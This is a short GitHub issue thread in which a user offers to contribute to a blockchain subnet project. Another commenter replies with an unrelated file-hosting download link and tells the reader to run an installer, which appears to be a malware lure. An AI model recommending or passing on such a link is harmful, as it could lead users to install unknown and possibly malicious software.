### ISSUE TITLE
I wanna work with you.

### ISSUE THREAD

**Issue by ShinySyntax** [inference-labs-inc/omron-subnet#19]
Hello.
Nice to meet you.
I am interested in your Omron Subnet.
As  a fullstack blockchain engineer, i can contribute in your community.
This is my personal website.
https://shiny-dev.com

You can check my experience and skills.
Thanks

**Comment by Shadi201711** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
